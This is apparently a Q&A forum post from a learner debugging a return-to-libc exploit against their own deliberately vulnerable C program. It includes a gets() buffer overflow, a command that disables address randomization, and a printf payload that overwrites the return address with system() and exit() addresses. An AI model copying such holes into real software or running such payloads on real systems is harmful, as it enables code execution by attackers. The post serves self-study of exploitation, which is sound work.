0

I'd like to learn how return to libc attacks work, so I have written a vulnerable program so that I can change the return address of a function to that of system(). However, the program doesn't appear to call system() and exits cleanly.

Prerequisites

- I'm using Debain Squeeze

- I have disabled address randomization with:

echo 0 > /proc/sys/kernel/randomize_va_space

Vulnerable Code

#include <stdio.h>

void someFunc(void);

void someFunc(void){
    char buffer[64];

    gets(buffer);
    //puts(buffer);
}

int main(int argc, char **argv)
{
    someFunc();
    return 0;
}

The code is compiled with:

gcc -fno-stack-protector -ggdb -o vuln vuln.c

Using GDB I have asserted that:

  1. /bin/zsh is @ 0xbffff9b9
  2. system() is @ 0xb7ed0000
  3. exit() is @ 0xb7ec60f0

Exploit

I exploit it by piping in 72 zeros, exit, system and the pointer to /bin/zsh, in that order:

printf "%072x\xf0\x60\xec\xb7\x00\x00\xed\xb7\xb9\xf9\xff\xbf" | ./vuln

The program doesn't segfault or execute /bin/zsh.

In GDB

Interestingly, if I change SHELL="/xin/zsh", and execute it in gdb, the system call works:

Cannot exec /xin/zsh

So my questions are:

  1. Have I understood the return to libc attack concept correctly?

  2. Am I piping the malicious code in the correct way and order?

  3. Why does it appear to work in GDB, but not in the shell?
    (I've already read return to libc works in gdb but not when running alone)

Community
  • 1
  • 1
Chris Adams
  • 1
  • 1
  • What platform are you on? Maybe you need `-O0` to disable inlining? – Thomas Sep 09 '12 at 15:21
  • It's debian squeeze x86, running inside a virtualbox. – Chris Adams Sep 09 '12 at 15:43
  • what does `bt` return after the segfault when you `run` this in gdb? – zetavolt Sep 09 '12 at 20:19
  • There may be a problem with aligning stack boundaries. Have you tried setting -mpreferred-stack-boundary=2 http://laramies.blogspot.com/2004/11/gcc-mpreferred-stack-boundarynum.html... this is crucial to get your exploit to work – asudhak Sep 14 '12 at 15:03

0 Answers0